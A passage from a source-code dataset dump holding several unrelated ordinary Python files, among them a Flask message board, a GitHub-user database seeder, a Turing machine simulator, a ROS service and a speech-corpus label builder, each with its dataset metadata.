report_number,\n \"period_number\": period_number,\n \"quarter_name\": quarter_name,\n \"trich_yeu\": trich_yeu,\n \"time_sent\": time_sent,\n }\n df = pd.DataFrame(dict)\n complete_df.append(df)\n final_df = pd.concat(complete_df)\n return final_df\n\n\nif __name__ == \"__main__\":\n df = crawler(url)\n print(df.info)\n","sub_path":"old_version/crawl_meta_sites.py","file_name":"crawl_meta_sites.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"398382485","text":"from __future__ import division\nfrom builtins import str\nfrom builtins import object\nfrom past.utils import old_div\nfrom collections import defaultdict\nimport time\nfrom datetime import datetime\nimport json\nimport uuid\n\n# decimal import compatible with py2\ntry:\n from decimal import Decimal\nexcept NameError:\n from cdecimal import Decimal\n\nfrom sqlalchemy import ForeignKey, Column, Integer, Unicode, DateTime, UnicodeText, Numeric, desc, UniqueConstraint\nfrom sqlalchemy.dialects.mysql import DATETIME\n\nfrom lib.models.base import Base #pyx file\nfrom lib import session\nfrom lib.singleton import Singleton\n\nimport pandas as pd\nimport numpy as np\nfrom future.utils import with_metaclass\n\nmetadata = Base.metadata\n\n\nclass Datum(Base):\n __tablename__ = 'datum_indicators'\n\n unique_id = Column(Unicode(64), nullable=False)\n datum_id = Column(Integer, primary_key=True)\n time_created = Column(DateTime, nullable=False)\n datum_type = Column(Unicode(64), nullable=False)\n timestamp = Column(Integer, nullable=True)\n exchange = Column(Unicode(64), nullable=False)\n numeric_value = Column(Numeric(precision=20, scale=4))\n string_value = Column(Unicode(256))\n meta_data = Column(UnicodeText(length=2**31))\n\n\n order_id = Column(Integer, ForeignKey('order.order_id'), nullable=True)\n \n __table_args__ = (UniqueConstraint(\"datum_type\", \"timestamp\", \"exchange\", name=\"di_uid\"),)\n\n\n def __init__(self, datum_type, timestamp=None, exchange=None, numeric_value=None, string_value=None, meta_data={}, order=None):\n self.time_created = datetime.utcnow()\n self.datum_type = str(datum_type, \"utf-8\")\n if timestamp is None:\n self.timestamp = datetime.utcnow().strftime(\"%s\")\n else:\n self.timestamp = int(round(timestamp))\n self.exchange = str(exchange, \"utf-8\")\n self.numeric_value = numeric_value\n self.string_value = string_value \n self.unique_id = u'dat_%s' % str(uuid.uuid4().hex)\n self.meta_data = json.dumps(meta_data)\n self.order = order\n\n def __unicode__(self):\n return str(repr(self))\n\n def __repr__(self):\n d = {\n 'datum_type': self.datum_type,\n 'time_created': str(self.time_created),\n 'timestamp' : self.timestamp,\n 'exchange' : self.exchange,\n 'meta_data': json.loads(self.meta_data),\n }\n if self.numeric_value:\n d.update({'numeric_value': str(self.numeric_value)})\n if self.string_value:\n d.update({'string_value': self.string_value})\n\n return json.dumps(d, ensure_ascii=False)\n\n\nclass DatumRecorder(with_metaclass(Singleton, object)):\n def create(self, db=None, logger=None):\n self.db = db\n self.external_logger = logger\n self.data_for_mean = defaultdict(list)\n\n def record(self, datum_type, timestamp, exchange, numeric_value=None, string_value=None, meta_data={}, order=None):\n datum = Datum(\n datum_type,\n timestamp,\n exchange,\n numeric_value=numeric_value,\n string_value=string_value,\n meta_data=meta_data,\n order=order,\n )\n\n if not hasattr(self, 'db') and not hasattr(self, 'external_logger'):\n raise Exception('DatumRecorder must be created before you can record')\n\n if self.db:\n self.db.add(datum)\n session.commit_mysql_session(self.db)\n \n elif self.external_logger:\n self.external_logger.info(datum)\n else:\n # we aren't recording events.\n pass\n\n def record_mean(self, datum_type, timestamp, exchange, numeric_value, sample_size):\n \"\"\"\n Store a datum with the mean of every data points.\n\n This has weird behaviour if two places call it with different sample_sizes.\n We should only have one DatumRecorder line per datum_type\n \"\"\"\n if not hasattr(self, 'data_for_mean'):\n raise Exception('DatumRecorder must be created before you can record')\n\n data = self.data_for_mean[datum_type]\n data.append(numeric_value)\n\n if len(data) >= sample_size:\n mean = old_div(Decimal(sum(data)), Decimal(len(data)))\n self.record(datum_type, timestamp, exchange, numeric_value=mean)\n # Clear the content of a referenced list\n del data[:]\n\n\nclass DatumRetriever(with_metaclass(Singleton, object)):\n def __init__(self, datum_type=None, exchange=None, timestamp=None):\n self.datum_type = datum_type\n self.exchange = exchange\n self.timestamp = timestamp\n\n def get(self):\n '''try to filter automatically by args that are not none'''\n db = session.get_a_trading_db_mysql_session()\n data = db.query(Datum).filter_by(\n datum_type=self.datum_type,\n exchange=self.exchange).order_by(\n desc(Datum.timestamp)).all()\n\n return data\n \n def get_pandas(self):\n raw_series = self.get()\n pd_series = self.convert_series_to_pandas(raw_series)\n\n return pd_series\n\n def convert_series_to_pandas(self, series):\n series = sorted(series, key=lambda m: m.timestamp)\n\n index = [m.timestamp for m in series]\n values = [float(m.numeric_value) if m.numeric_value is not None else np.nan for m in series]\n\n return pd.Series(values, index=index)\n\n","sub_path":"app/lib/models/clickhouse/datum_indicators.py","file_name":"datum_indicators.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"272156951","text":"# Copyright (c) 2016, Zsombor Hollay-Horváth\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, cairo, PangoCairo\nimport cairo\n\n\nimport math\n\n\nfrom enum import Enum\n\n\nfrom ui.Container import Container\n\n\n\nclass Bin(Container):\n\n class CornerStyle(Enum):\n SHARP = 0\n ROUND_SMALL = 1\n ROUND_BIG = 2\n\n\n class Style:\n def __init__(self, style = {}):\n self.background = (1, 1, 1)\n self.bordercolor = (0, 0, 0)\n self.borderwidth = 1\n self.corners = (Bin.CornerStyle.SHARP,\n Bin.CornerStyle.SHARP,\n Bin.CornerStyle.SHARP,\n Bin.CornerStyle.SHARP)\n\n self.set_style(style)\n\n\n def set_style(self, style = {}):\n for key, val in style.items():\n self.__setattr__(key, val)\n\n self.update_corners()\n\n\n def set_background(self, background):\n self.background = background\n\n\n def get_background(self):\n return self.background\n\n\n def set_bordercolor(self, bordercolor):\n self.bordercolor = bordercolor\n\n\n def get_bordercolor(self):\n return self.bordercolor\n\n\n def set_borderwidth(self, borderwidth):\n self.borderwidth = borderwidth\n\n\n def get_borderwidth(self):\n return self.borderwidth\n\n\n def set_corners(self, corners):\n self.corners = corners\n self.update_corners()\n\n\n def get_corners(self):\n return self.corners\n\n\n def update_corners(self):\n if (isinstance(self.corners, Bin.CornerStyle)):\n self.corners = (self.corners,\n self.corners,\n self.corners,\n self.corners)\n elif (len(self.corners) == 2):\n self.corners = (self.corners[0],\n self.corners[0],\n self.corners[1],\n self.corners[1])\n\n\n def __init__(self, size = (20, 20), position = (0, 0)):\n Container.__init__(self)\n self.show = True\n\n self.size = (size[0]-1, size[1]-1)\n self.position = position\n self.update_delta()\n\n self.style = Bin.Style()\n\n\n def set_show(self, show):\n self.show = show\n\n\n def get_show(self):\n return self.show\n\n\n def toggle_show(self):\n self.show = not self.show\n\n\n def set_size(self, x, y):\n self.size = (x-1, y-1)\n self.update_delta()\n\n\n def get_size(self):\n return self.size\n\n\n def set_position(self, w, h):\n self.position = (w, h)\n self.update_delta()\n\n\n def get_position(self):\n return self.position\n\n\n def update_delta(self):\n self.delta = (self.position[0]+self.size[0], self.position[1]+self.size[1])\n\n\n def set_style(self, style):\n self.style.set_style(style)\n\n\n def get_style(self):\n return self.style\n\n\n def draw(self, cr):\n if (not self.show):\n return\n\n corners = self.style.get_corners()\n\n cr.new_sub_path()\n if (corners[0] == Bin.CornerStyle.SHARP):\n cr.arc(self.position[0], self.position[1], 0, -math.pi, -math.pi/2)\n elif (corners[0] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.position[0]+4, self.position[1]+4, 4, -math.pi, -math.pi/2)\n else:\n cr.arc(self.position[0]+9, self.position[1]+9, 9, -math.pi, -math.pi/2)\n\n if (corners[1] == Bin.CornerStyle.SHARP):\n cr.arc(self.delta[0], self.position[1], 0, -math.pi/2, 0)\n elif (corners[1] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.delta[0]-4, self.position[1]+4, 4, -math.pi/2, 0)\n else:\n cr.arc(self.delta[0]-9, self.position[1]+9, 9, -math.pi/2, 0)\n\n if (corners[2] == Bin.CornerStyle.SHARP):\n cr.arc(self.delta[0], self.delta[1], 0, 0, math.pi/2)\n elif (corners[2] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.delta[0]-4, self.delta[1]-4, 4, 0, math.pi/2)\n else:\n cr.arc(self.delta[0]-9, self.delta[1]-9, 9, 0, math.pi/2)\n\n if (corners[3] == Bin.CornerStyle.SHARP):\n cr.arc(self.position[0], self.delta[1], 0, math.pi/2, math.pi)\n elif (corners[3] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.position[0]+4, self.delta[1]-4, 4, math.pi/2, math.pi)\n else:\n cr.arc(self.position[0]+9, self.delta[1]-9, 9, math.pi/2, math.pi)\n cr.close_path()\n\n cr.set_source_rgba(*self.style.get_background())\n cr.fill_preserve()\n\n cr.set_source_rgba(*self.style.get_bordercolor())\n cr.set_line_width(self.style.get_borderwidth())\n cr.stroke()\n","sub_path":"ui/Bin.py","file_name":"Bin.py","file_ext":"py","file_size_in_byte":6190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"602961054","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 31 22:12:05 2015\n\n@author: cory\n\"\"\"\n\nfrom nltk.corpus import wordnet as wn\n\nwith open(\"./Data/cleaned_nouns.txt\", \"r\") as cleaned:\n with open(\"./Data/tagged_and_nouned.txt\", \"w\") as tagnoun:\n entries = []\n for noun in cleaned.readlines():\n noun = str(noun)[:-1]\n tag = wn.synsets(noun)\n if tag:\n tag = str(tag)\n if noun.lower() + \".n.\" in tag and \"_\" not in tag:\n entries.append(noun.lower())\n else:\n entries.append(noun.lower())\n entries = list(set(entries)) \n for entry in sorted(entries):\n tagnoun.write(entry + \"\\n\")","sub_path":"tag_pos.py","file_name":"tag_pos.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"639757054","text":"import warnings\nfrom abc import ABC\nfrom typing import Any, ClassVar\n\nfrom pydantic import BaseModel\nfrom pydantic.validators import dict_validator\n\nfrom gmso.abc.auto_doc import apply_docs\n\n\nclass GMSOBase(BaseModel, ABC):\n \"\"\"A BaseClass to all abstract classes in GMSO\"\"\"\n __base_doc__: ClassVar[str] = \"\"\"A base class to all abstract base classes in gmso.\"\"\"\n\n __docs_generated__: ClassVar[bool] = False\n\n def __hash__(self):\n return id(self)\n\n def __eq__(self, other):\n return self is other\n\n def __setattr__(self, name: Any, value: Any) -> None:\n if name in self.__config__.alias_to_fields:\n name = self.__config__.alias_to_fields[name]\n else:\n warnings.warn(\n 'Use of internal fields is discouraged. '\n 'Please use external fields to set attributes.'\n )\n\n super().__setattr__(name, value)\n\n @classmethod\n def __init_subclass__(cls, **kwargs):\n super().__init_subclass__()\n setattr(cls, '__docs_generated__', False)\n for super_class in cls.mro()[1:]:\n if hasattr(super_class, 'Config') and \\\n hasattr(super_class.Config, 'alias_to_fields') and \\\n hasattr(cls.Config, 'alias_to_fields'):\n cls.Config.alias_to_fields.update(super_class.Config.alias_to_fields)\n apply_docs(cls, map_names=True, silent=False)\n\n @classmethod\n def validate(cls, value):\n if isinstance(value, cls):\n return value\n else:\n return cls(**dict_validator(value))\n\n @classmethod\n def __get_validators__(cls) -> 'CallableGenerator':\n yield cls.validate\n\n class Config:\n arbitrary_types_allowed = True\n alias_to_fields = dict()\n extra = 'forbid'\n","sub_path":"gmso/abc/gmso_base.py","file_name":"gmso_base.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"173553240","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8\n# Author: Shinya Suzuki\n# Created: 2017-11-16\n\nfrom flask import render_template, request\nfrom application import app, db\nfrom application.models import Profile\nfrom application.models import Message\n\n\n@app.route('/')\ndef route_index():\n return render_template('index.html')\n\n\n@app.route('/profile')\ndef route_profile():\n id = request.args.get('id', type=int)\n if id is not None:\n profiles = Profile.query.get(id)\n if profiles is not None:\n return render_template('profile.html', profile=profiles)\n else:\n return render_template('profile.html')\n else:\n return render_template('profile.html')\n\n\n@app.route('/bbs', methods=['GET', 'POST'])\ndef route_bbs():\n if request.method == 'POST':\n m = request.form['message']\n message = Message(\n message=m\n )\n db.session.add(message)\n db.session.commit()\n messages = Message.query.with_entities(Message.message)\n return render_template('bbs.html', messages=messages)\n","sub_path":"application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"533682790","text":"#! /usr/bin/env python\n\nimport rospy\nfrom std_srvs.srv import Empty, EmptyResponse\nfrom move_bb8 import MoveBB8\n\ndef my_callback(request):\n rospy.loginfo(\"The service MoveBB8 is called\")\n movebb8_object= MoveBB8()\n movebb8_object.move_square()\n rospy.loginfo(\"Finished service call\")\n return EmptyResponse() \n\n\nrospy.init_node('service_move_bb8_in_square_server') \nmy_service = rospy.Service('/move_bb8_in_square', Empty , my_callback) # create the Service called my_service with the defined callback\nrospy.loginfo(\"service /move_bb8_in_square is ready\")\nrospy.spin() # maintain the service open.","sub_path":"ROS_Basics/unit_3_2_services/src/bb8_move_in_square_server.py","file_name":"bb8_move_in_square_server.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"263573200","text":"import math\n\n\"\"\"\n\nЛитовченко Даниил, ИВТ 2 группа 3 подгруппа\n\nВариант 6:\nПлощадь поверхности куба равна s. Найдите его диагональ.\nРешение задачи оформите в в��де функции diagonal(s), которая будет возвращать d.\nНапример, при s=18 функция diagonal(18) вернет значение переменной d,\nкоторая равна 3\n\n\"\"\"\n\ndef diagonal(s):\n a = math.sqrt(s/6)\n d = math.sqrt(3*a*a)\n return d\n\ns=float(input(\"Введите площадь поверхности: \"))\nprint(\"Диагональ: \",diagonal(s))\n","sub_path":"3 семестр/Тема 2/samrab8(2.4).py","file_name":"samrab8(2.4).py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"64954113","text":"''' \r\n TRABALHO PRATICO\r\n GCC108 - Teoria da Computacao\r\n Nome: Juliano Expedito de Andrade Godinho\r\n Turma: 14A\r\n Matricula: 201811302\r\n \r\n'''\r\n\r\n# Funcao para checar se a fita esta correta!\r\ndef checarFita(fita, alfabeto):\r\n \r\n for f in fita:\r\n # Se nao pertencer ao alfabeto, retorna False e a letra do alfabeto\r\n if f not in alfabeto:\r\n return False, f\r\n \r\n # Caso o alfabeto esteja correto, retorna True e uma string vazia\r\n return True, ''\r\n\r\n\r\n# Utilizando o sys para abertura do arquivo\r\nimport sys\r\n\r\n# Uma lista com os estados\r\n# Cada posicao representa um estado que contem um dicionario com as transicoes\r\n# [{}, {}, {}]\r\nestados = []\r\n\r\n# Alfabeto de entrada\r\nalfabeto_entrada = []\r\n\r\n# Alfabeto da fita\r\nalfabeto_fita = []\r\n \r\n# Abrindo o arquivo\r\nf = open(sys.argv[1])\r\n\r\n# Leitura do inicio\r\nf.read(3)\r\n\r\n# Lendo os estados\r\nwhile f.read(1) != ',':\r\n \r\n # Lendo cada estado e uma virgula\r\n f3 = f.read(3)\r\n \r\n # Adicionando um dicionario vazio a lista de estados\r\n estados.append({})\r\n \r\n \r\n# Leitura apos os estados\r\nf.read(2)\r\n\r\n\r\n# Lendo o alfabeto de entrada\r\nwhile f.read(1) != ',':\r\n \r\n f2 = f.read(2)\r\n \r\n alfabeto_entrada.append(f2[0])\r\n \r\n \r\n# Leitura apos alfabeto de entrada\r\nf.read(2)\r\n\r\n\r\n# Lendo o alfabeto da fita\r\nwhile f.read(1) != '}':\r\n \r\n # Lendo uma letra do alfabeto\r\n f1 = f.read(1)\r\n \r\n # Adicionando ao alfabeto\r\n alfabeto_fita.append(f1)\r\n \r\n # Cria uma chave que corresponde a letra do alfabeto em cada estado na lista de estados\r\n for estado in estados:\r\n estado[f1] = {}\r\n\r\n\r\n# Leitura apos o alfabeto da fita\r\nf.read(4)\r\n\r\n\r\n# Escrevendo as transicoes no dicionario de cada estado\r\nwhile f.read(3)[1] != '}':\r\n \r\n # Lendo a linha da transicao\r\n # Exemplo(22 caracteres): (q0, B) -> (q1, B, R),\r\n transicao = f.read(22)\r\n \r\n # Pegando o estado da lista estados\r\n estado = estados[eval(transicao[2])]\r\n \r\n '''\r\n Exemplo do formato:\r\n Estado q0 -> portanto pega-se a posicao 0 da lista de estados\r\n No dicionario desta posicao, entao se adiciona uma chave que corresponde a leitura\r\n E seu valor e uma tupla que corresponde (qj, y, D)\r\n Sendo qj o destino da transicao\r\n y a escrita\r\n e D a direcao\r\n Exemplo:\r\n (q0, B) -> (q1, B, R),\r\n Posicao 0 na lista estados\r\n {'B' : (q1, B, R)}\r\n Portanto, o estado q0 ao ler B, ira para q1, escrevera B na fita e ira para direita\r\n '''\r\n estado[transicao[5]]= (transicao[13], transicao[16], transicao[19])\r\n \r\n \r\n# Guardando o estado inicial\r\nestado_inicial = f.read(8)[3]\r\n\r\n# Lendo a fita (Restante do arquivo)\r\nfita = f.readlines()[0]\r\n\r\n# Fechando o arquivo\r\nf.close()\r\n\r\n# Criando o estado atual\r\nestado_atual = estado_inicial\r\n\r\n# Posicao da fita\r\npos = 0\r\n\r\n# Realizando a checagem da fita\r\nchecagem = checarFita(fita, alfabeto_fita)\r\n\r\n# Caso a checagem esteja correta (True), entra no while para percorrer a fita\r\nif checagem[0]:\r\n \r\n # Criando o arquivo para saida - Cria-se apenas se nao houver erro na fita\r\n f = open(sys.argv[2], 'w')\r\n \r\n # Loop\r\n while True:\r\n \r\n # Escrevendo a fita no arquivo\r\n f.write(fita[:pos] + '{{q{}}}'.format(estado_atual) + fita[pos:] + '\\n')\r\n \r\n # Recebendo o estado\r\n estado = estados[eval(estado_atual)]\r\n \r\n # Leitura da posicao atual da fita\r\n leitura = fita[pos]\r\n \r\n # Tupla -> (Destino, Escrita, Movimento)\r\n tupla = estado[leitura]\r\n \r\n # Condicao de Parada\r\n # Caso o estado atual nao consiga transitar com a posicao atual da fita, programa para!\r\n if tupla == {}:\r\n break\r\n \r\n # Organizando e escrevendo na fita\r\n fita = fita[:pos] + tupla[1] + fita[pos+1:]\r\n \r\n # Movimentando\r\n if tupla[2] == 'R':\r\n pos += 1\r\n else: pos -= 1\r\n \r\n # Alterando o estado atual\r\n estado_atual = tupla[0]\r\n \r\n# Caso a fita esteja incorreta, emite uma mensagem, indicando o erro na fita\r\nelse:\r\n print('Fita incorreta - Arquivo nao foi criado! {} nao pertence ao alfabeto da fita!'.format(checagem[1]))\r\n ","sub_path":"Máquina de Turing/maquina.py","file_name":"maquina.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"18526620","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Make character-level target labels for the End-to-End model (TIMIT corpus).\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os.path import join, basename\nimport re\nimport numpy as np\nfrom tqdm import tqdm\nimport pickle\n\nfrom utils.labels.character import char2index\n\n# NOTE:\n############################################################\n# CTC model\n\n# - character\n# 26 alphabets(a-z),\n# space(_), apostorophe('),\n# = 26 + 2 = 28 labels\n\n# - character_capital_divide\n# 26 lower alphabets(a-z), 26 upper alphabets(A-Z),\n# 19 special double-letters, apostorophe(')\n# = 26 * 2 + 19 + 1 = 72 labels\n############################################################\n\n############################################################\n# Attention-based model\n\n# - character\n# 26 alphabets(a-z), , \n# space(_), apostorophe(')\n# = 26 + 2 + 2 = 30 labels\n\n# - character_capital_divide\n# 26 lower alphabets(a-z), 26 upper alphabets(A-Z) , \n# 19 special double-letters, apostorophe(')\n# = 26 * 2 + 2 + 19 + 1 = 74 labels\n############################################################\n\n\ndef read_text(label_paths, run_root_path, model, save_map_file=False,\n save_path=None, divide_by_capital=False, stdout_transcript=False):\n \"\"\"Read text transcript.\n Args:\n label_paths (list): list of paths to label files\n run_root_path (string): absolute path of make.sh\n model (string): ctc or attention\n save_map_file (string): if True, save the mapping file\n save_path (string, optional): path to save labels. If None, don't save labels\n divide_by_capital (bool, optional): if True, each word will be diveded\n by capital letters rather than spaces. In addition, repeated letters\n will be grouped by a special double-letter unit.\n ex.) hello => h e ll o\n This implementation is based on\n https://arxiv.org/abs/1609.05935.\n Zweig, Geoffrey, et al.\n \"Advances in all-neural speech recognition.\"\n in Proceedings of ICASSP, 2017.\n stdout_transcript (bool, optional): if True, print transcripts to standard output\n \"\"\"\n if model not in ['ctc', 'attention']:\n raise TypeError('model must be ctc or attention.')\n\n print('===> Reading target labels...')\n text_dict = {}\n char_set = set([])\n for label_path in tqdm(label_paths):\n with open(label_path, 'r') as f:\n line = f.readlines()[-1]\n\n # Remove 「\"」, 「:」, 「;」, 「!」, 「?」, 「,」, 「.」, 「-」\n # Convert to lowercase\n line = re.sub(r'[\\\":;!?,.-]+', '', line.strip().lower())\n\n if divide_by_capital:\n transcript = ''\n for word in line.split(' ')[2:]:\n if len(word) == 0:\n continue\n\n # Replace space with a capital letter\n word = word[0].upper() + word[1:]\n\n # Check double-letters\n for i in range(0, len(word) - 1, 1):\n if word[i] == word[i + 1]:\n char_set.add(word[i] * 2)\n\n transcript += word\n\n else:\n # Convert space to \"_\"\n transcript = '_'.join(line.split(' ')[2:])\n\n if model == 'attention':\n transcript = '<' + transcript + '>'\n\n for c in list(transcript):\n char_set.add(c)\n\n text_dict[label_path] = transcript\n\n # for debug\n if stdout_transcript:\n # print(transcript)\n speaker = label_path.split('/')[-2]\n utt_index = basename(label_path).split('.')[0]\n print(speaker + '_' + utt_index)\n\n # Make mapping file (from character to number)\n if divide_by_capital:\n mapping_file_path = join(\n run_root_path, 'labels', 'mapping_files', model, 'character_capital.txt')\n else:\n mapping_file_path = join(\n run_root_path, 'labels', 'mapping_files', model, 'character.txt')\n char_set.discard('_')\n char_set.discard('\\'')\n if model == 'attention':\n char_set.discard('<')\n char_set.discard('>')\n\n if save_map_file:\n with open(mapping_file_path, 'w') as f:\n if model == 'attention':\n char_list = ['<', '>']\n elif model == 'ctc':\n char_list = []\n\n if divide_by_capital:\n char_list += sorted(list(char_set)) + ['\\'']\n else:\n char_list += ['_'] + sorted(list(char_set)) + ['\\'']\n\n for i, char in enumerate(char_list):\n f.write('%s %s\\n' % (char, str(i)))\n\n if save_path is not None:\n label_num_dict = {}\n # Save target labels\n print('===> Saving target labels...')\n for label_path, transcript in tqdm(text_dict.items()):\n speaker = label_path.split('/')[-2]\n utt_index = basename(label_path).split('.')[0]\n\n # Convert from character to index\n index_list = char2index(transcript, mapping_file_path,\n double_letter=divide_by_capital)\n\n # Save as npy file\n np.save(join(save_path, speaker + '_' + utt_index + '.npy'), index_list)\n\n # Count label number\n label_num_dict[speaker + '_' + utt_index] = len(index_list)\n\n # Save the label number dictionary\n print('===> Saving : label_num.pickle')\n with open(join(save_path, 'label_num.pickle'), 'wb') as f:\n pickle.dump(label_num_dict, f)\n","sub_path":"timit/labels/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"196228081","text":"#!/usr/bin/python3\nimport sys\nimport requests\nimport sqlite3\n\n# sql statement for the creation of the users table\nsqlUsersTable = 'CREATE TABLE IF NOT EXISTS user (id integer PRIMARY KEY, username VARCHAR, ghid integer, image_url VARCHAR, ghtype VARCHAR, link VARCHAR);'\n# sql statement for deleting previous data;INTO\nsqlDeletePreviousEntries = 'DELETE FROM user;'\n\ndef createConnection():\n \"\"\" create a database connection to a database that resides\n in the same folder as this script\n :return: db connection\n \"\"\"\n conn = None;\n try:\n conn = sqlite3.connect('app/users.db')\n except sqlite3.Error as e:\n print(e)\n finally:\n return conn\n\ndef createTable(conn, create_table_sql):\n \"\"\" create a table from the create_table_sql statement\n :param conn: Connection object\n :param create_table_sql: a CREATE TABLE statement\n :return:\n \"\"\"\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n c.execute(sqlDeletePreviousEntries)\n except sqlite3.Error as e:\n print(e)\n\ndef createUsers(conn, users):\n \"\"\" insert users in to the provided DB\n :param conn: Connection object\n :param users: list of users to be inserted in the database\n :return: lastrowid from the insert\n \"\"\"\n sql = 'INSERT INTO user(username, ghid, image_url, ghtype, link) VALUES (?, ?, ?, ?, ?);'\n cursor = conn.cursor()\n cursor.executemany(sql, users)\n conn.commit()\n return cursor.lastrowid\n\ndef getUsers(nUsers=150, timeout=10):\n \"\"\" retrive the amount of users from github\n :param nUsers: total number of users to retrive default 150\n :param timeout: timeout for the requests default 10 seconds\n :return: list of users\n \"\"\"\n #test if the requested users are more than 100 because\n #thats the max amount allowed per request\n maxAmount = 100\n\n if nUsers > maxAmount:\n parameters = {'per_page': maxAmount}\n else:\n parameters = {'per_page': nUsers}\n petitions = [maxAmount] * (int(nUsers/maxAmount) - 1)\n if nUsers%maxAmount != 0 and nUsers > maxAmount:\n petitions.append(nUsers%maxAmount)\n url = 'https://api.github.com/users'\n try:\n userRows = []\n response = requests.get(url, params=parameters, timeout=timeout)\n users = response.json()\n for petition in petitions:\n url = response.links['next']['url']\n response = requests.get(url, timeout=timeout)\n users = users + response.json()[:petition]\n for user in users:\n userRows.append((user['login'], user['id'], user['avatar_url'], user['type'], user['html_url']))\n return userRows\n except Exception as e:\n print('an error occured when retriving users: {}'.format(e))\n\ndef main(total=150):\n db = createConnection()\n createTable(db, sqlUsersTable)\n\n users = getUsers(total)\n createUsers(db, users)\n\nif __name__ == '__main__':\n args = sys.argv\n total = 150\n if len(args) == 2:\n total = int(args[1])\n print(total)\n main(total)\n","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"471067561","text":"import os\nimport importlib\nimport logging\nfrom .posixfs_context import LocalFSState\n\nfrom ..utils import handler_decorator\n\nlog = logging.getLogger(__name__)\n\nstatehandlers, stateloader = handler_decorator()\n\n\n@stateloader(\"frompython\")\ndef frompython_stateloader(jsondata, **opts):\n statestring = opts[\"statestring\"]\n _, module, stateclass = statestring.split(\":\")\n module = importlib.import_module(module)\n stateclass = getattr(module, stateclass)\n stateopts = {}\n return stateclass.fromJSON(jsondata, **stateopts)\n\n\n@stateloader(\"localfs\")\ndef localfs_stateloader(jsondata, **opts):\n return LocalFSState.fromJSON(jsondata)\n\n\n@stateloader(\"fromenv\")\ndef fromenv_stateloader(jsondata, **opts):\n module = importlib.import_module(os.environ[\"PACKTIVITY_STATEPROVIDER\"])\n return module.load_state(jsondata)\n\n\ndef load_state(jsondata, deserialization_opts=None):\n log.debug(\"load_state opts %s\", deserialization_opts)\n deserialization_opts = deserialization_opts or {}\n if \"state\" in deserialization_opts:\n statestring = deserialization_opts.get(\"state\", \"\")\n if statestring.startswith(\"py:\"):\n return statehandlers[\"frompython\"][\"default\"](\n jsondata, statestring=statestring\n )\n\n if \"PACKTIVITY_STATEPROVIDER\" in os.environ:\n return statehandlers[\"fromenv\"][\"default\"](jsondata)\n\n if jsondata[\"state_type\"] in statehandlers:\n return statehandlers[jsondata[\"state_type\"]][\"default\"](jsondata)\n\n raise TypeError(\"unknown state type {}\".format(jsondata[\"state_type\"]))\n","sub_path":"packtivity/statecontexts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"8914283","text":"# Defining Game Lexicon\r\ngame_lexicon = {\r\n 'direction' : ['north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back'],\r\n 'verb' : ['go', 'stop', 'kill', 'eat'],\r\n 'stop' : ['the', 'in', 'of', 'from', 